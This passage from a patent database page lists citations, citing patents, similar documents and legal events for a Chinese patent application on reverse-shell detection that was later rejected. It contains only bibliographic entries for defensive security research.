| CN107423622A (en) * | 2017-07-04 | 2017-12-01 | 上海高重信息科技有限公司 | A kind of method and system for detecting and taking precautions against bounce-back shell |
Non-Patent Citations (1)
| Title |
|---|
| ZHANGHAOYIL: "《FREEBUF https://www.freebuf.com/articles/system/187584.html》", 1 November 2018 * |
Cited By (15)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| CN110535724A (en) * | 2019-08-28 | 2019-12-03 | 深圳市网心科技有限公司 | Application program net reading and writing method for limiting, device, electronic equipment and storage medium |
| CN110909349A (en) * | 2019-11-14 | 2020-03-24 | 上海携程商务有限公司 | detection method and system for rebound shell in docker container |
| CN110909349B (en) * | 2019-11-14 | 2024-03-22 | 上海携程商务有限公司 | detection method and system for rebound shell in dock container |
| CN113449298B (en) * | 2020-03-24 | 2023-09-05 | 百度在线网络技术(北京)有限公司 | Detection method, device, equipment and medium for rebound shell process |
| CN113449298A (en) * | 2020-03-24 | 2021-09-28 | 百度在线网络技术(北京)有限公司 | Detection method, device, equipment and medium for rebounding shell process |
| CN111857965A (en) * | 2020-07-28 | 2020-10-30 | 浙江军盾信息科技有限公司 | Intranet threat detection method, device, equipment and computer equipment |
| CN111988302A (en) * | 2020-08-14 | 2020-11-24 | 苏州浪潮智能科技有限公司 | Method, system, terminal and storage medium for detecting rebound program |
| CN112165469A (en) * | 2020-09-18 | 2021-01-01 | 中国船舶重工集团公司第七一四研究所 | Method for detecting deformed shell |
| CN113515743A (en) * | 2021-03-23 | 2021-10-19 | 杭州安恒信息技术股份有限公司 | Identification method and device of call chain of rebound shell process and electronic device |
| CN113515743B (en) * | 2021-03-23 | 2024-03-19 | 杭州安恒信息技术股份有限公司 | Identification method and device for rebound shell process call chain and electronic device |
| WO2022222255A1 (en) * | 2021-04-23 | 2022-10-27 | 杭州安恒信息技术股份有限公司 | Reverse shell risk determination method, apparatus and system |
| CN115695405A (en) * | 2021-07-28 | 2023-02-03 | 中移物联网有限公司 | Equipment control method, device, control terminal, execution terminal and service terminal |
| CN114039787B (en) * | 2021-11-15 | 2023-12-22 | 厦门服云信息科技有限公司 | Rebound shell detection method in linux system, terminal equipment and storage medium |
| CN114039787A (en) * | 2021-11-15 | 2022-02-11 | 厦门服云信息科技有限公司 | Rebound shell detection method in linux system, terminal device and storage medium |
| CN114722396A (en) * | 2022-05-18 | 2022-07-08 | 北京长亭未来科技有限公司 | Method, system and equipment for detecting rebound Shell process |
Similar Documents
| Publication | Publication Date | Title |
|---|---|---|
| CN110138727A (en) | The information searching method and device that the shell that rebounds is connected to the network | |
| US11681803B2 (en) | Malware identification using multiple artificial neural networks | |
| CN110166420A (en) | Rebound shell blocking-up method and device | |
| Rastogi et al. | Are these Ads Safe: Detecting Hidden Attacks through the Mobile App-Web Interfaces. | |
| CN105320883B (en) | File security loads implementation method and device | |
| JP6441957B2 (en) | Systems, devices, and methods that automatically validate exploits on suspicious objects and highlight display information associated with the proven exploits | |
| CN104517054B (en) | Method, device, client and server for detecting malicious APK | |
| EP3371953B1 (en) | System and methods for detecting domain generation algorithm (dga) malware | |
| US20130086688A1 (en) | Web application exploit mitigation in an information technology environment | |
| CN110099044A (en) | Cloud Host Security detection system and method | |
| CN103617395A (en) | Method, device and system for intercepting advertisement programs based on cloud security | |
| CN105631341B (en) | Blind detection method and device for vulnerability | |
| CN110417768B (en) | Botnet tracking method and device | |
| JP6349244B2 (en) | In-vehicle network testing equipment | |
| JP2019536158A (en) | Method and system for verifying whether detection result is valid or not | |
| CN106250761B (en) | Equipment, device and method for identifying web automation tool | |
| CN111177727A (en) | Vulnerability detection method and device | |
| CN105631321B (en) | A kind of detection method and device of virtual machine process information | |
| US9881155B2 (en) | System and method for automatic use-after-free exploit detection | |
| CN105592105B (en) | Guarantee the asynchronous system Network Access Method and device of safety | |
| CN104484608A (en) | Application-based message processing method and application-based message processing device | |
| CN114629686A (en) | Vulnerability attack detection method and device | |
| CN113709130A (en) | Risk identification method and device based on honeypot system | |
| KR20220073657A (en) | Image-based malicious code analysis method and apparatus and artificial intelligence-based endpoint detection and response system using the same | |
| EP2815350A2 (en) | Methods, systems, and media for inhibiting attacks on embedded devices |
Legal Events
| Date | Code | Title | Description |
|---|---|---|---|
| PB01 | Publication | ||
| PB01 | Publication | ||
| SE01 | Entry into force of request for substantive examination | ||
| SE01 | Entry into force of request for substantive examination | ||
| RJ01 | Rejection of invention patent application after publication | ||
| RJ01 | Rejection of invention patent application after publication |
Application publication date: 20190816 |